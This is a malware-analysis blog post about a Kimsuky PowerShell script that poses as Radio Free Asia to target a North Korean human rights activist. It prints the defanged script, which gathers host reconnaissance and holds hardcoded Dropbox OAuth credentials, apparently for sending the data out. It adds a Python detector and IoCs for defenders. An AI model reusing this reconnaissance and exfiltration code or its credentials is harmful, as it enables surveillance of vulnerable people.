Kimsuky malware disguised as Radio Free Asia and aimed at a specific North Korean human rights activist - log_processlist.ps1 (2024.12.02)
Today I will write about log_processlist.ps1 (2024.12.02), a piece of malware made by Kimsuky that disguises itself as Radio Free Asia and targets a specific North Korean human rights activist.
First of all, the malware was distributed from the following site.
hxxp://bureopen(.)store/1127
When you open the site you see the following screen, which lists first.txt, log_processlist.ps1, sec.txt and start.txt.
Let's look at log_processlist.ps1 first.
File name: log_processlist.ps1
Size: 2,176 bytes
MD5:d38a6f924abf59eac2f962dcbff6703c
SHA-1:a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
SHA-256:77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
PowerShell code contained in log_processlist.ps1
$iPath = "$env:TEMP\processlist(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl(.)zip";
$svbs = "$env:TEMP\start(.)vbs";
$tokenRequestParams = @{
grant_type = "refresh_token"
refresh_token = "-s1Ryl(F)Ep8QAAAAAAAAAAVWfHhsISNE(x)OVo(7)ath6dwDw8i8wym8E94AYvtlP5U-e";
client_id = "zx7ru0m(b0nqx5ytg"
client_secret = "ni9vqkv0t6p(z)lt2"
}
$qwa = "hxxps://a" (+) "pi(.)dr" + "opboxa" + "pi(.)com/oau" + "th2/to" (+) "ken"
$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Bod(y) $tokenRequestParams
if ([System(.)IO.File]::Exists($svbs)) {
remove-item $(s)vbs -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $o(P)ath -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($iPath)) {
remove-item $(i)Path -Force -Recurse -ErrorAction SilentlyContinue;
}
Get-NetIPAddress | O(u)t-File -FilePath $iPath -Append;
Get-Process | Out-File (-)FilePath $iPath -Append;
Get-WmiObject -Class Win32(L)ogicalDisk -Filter "Dri(v)eType=3" | Select-Object DeviceID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_.Size / 1GB, 2)}}, @{Name="Fre(e)Space(GB)"; Expression={[math]::round($_.FreeSpace / 1GB, 2)}} | Out-File -FilePath $iPath -Append;
G(e)t-LocalUser | Format-List * | Out-File -FilePath $iPath -Append;
Get-(W)miObject -Class Win32_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
$output(F)ile …
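The script above has a recognisable shape: a hashtable carrying a Dropbox refresh_token grant, the token endpoint split into string fragments and glued back with "+", Invoke-RestMethod against that URL, and a run of host-enumeration cmdlets appended to a file under $env:TEMP. The following detector is an added example (not code from the post or from the malware) that scores PowerShell script-block text for those traits after undoing the string-concatenation trick; the sample input is constructed to mirror the analysed script and uses placeholder credentials, not the real ones.

```python
import re

# Constructed sample in the shape of log_processlist.ps1 (placeholder secrets).
SAMPLE = r'''
$iPath = "$env:TEMP\processlist.txt";
$tokenRequestParams = @{
grant_type = "refresh_token"
refresh_token = "PLACEHOLDER_REFRESH_TOKEN"
client_id = "PLACEHOLDER_ID"
client_secret = "PLACEHOLDER_SECRET"
}
$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"
$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams
Get-NetIPAddress | Out-File -FilePath $iPath -Append;
Get-Process | Out-File -FilePath $iPath -Append;
Get-LocalUser | Format-List * | Out-File -FilePath $iPath -Append;
'''

# Constructed benign admin one-liner for comparison.
BENIGN = r'''
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5
'''

_CONCAT = re.compile(r'"\s*\+\s*"')  # matches the '" + "' seam between fragments
RECON_CMDS = ("Get-NetIPAddress", "Get-Process", "Get-LocalUser",
              "Win32_LogicalDisk", "Win32_OperatingSystem")


def normalize(script: str) -> str:
    """Join split string literals so a fragmented URL becomes readable again."""
    return _CONCAT.sub("", script)


def analyze(script: str) -> dict:
    """Score one script block; 'suspicious' needs at least three of the traits."""
    low = normalize(script).lower()
    f = {
        "concat_joins": len(_CONCAT.findall(script)),
        "dropbox_oauth_token_endpoint": "api.dropboxapi.com/oauth2/token" in low,
        "refresh_token_grant": re.search(r'grant_type\s*=\s*"refresh_token"', low) is not None,
        "invoke_restmethod": "invoke-restmethod" in low,
        "temp_collection": "$env:temp" in low
            and re.search(r"out-file\s+-filepath\s+\$\w+", low) is not None,
        "recon_cmdlets": sorted(c for c in RECON_CMDS if c.lower() in low),
    }
    f["score"] = sum([f["concat_joins"] >= 3, f["dropbox_oauth_token_endpoint"],
                      f["refresh_token_grant"], f["invoke_restmethod"],
                      f["temp_collection"], len(f["recon_cmdlets"]) >= 2])
    f["verdict"] = "suspicious" if f["score"] >= 3 else "benign"
    return f
```

Feed it the ScriptBlockText of Microsoft-Windows-PowerShell event 4104 records to apply the same scoring to logged script blocks.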
IoC
http://bureopen.store/1127
a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
d38a6f924abf59eac2f962dcbff6703c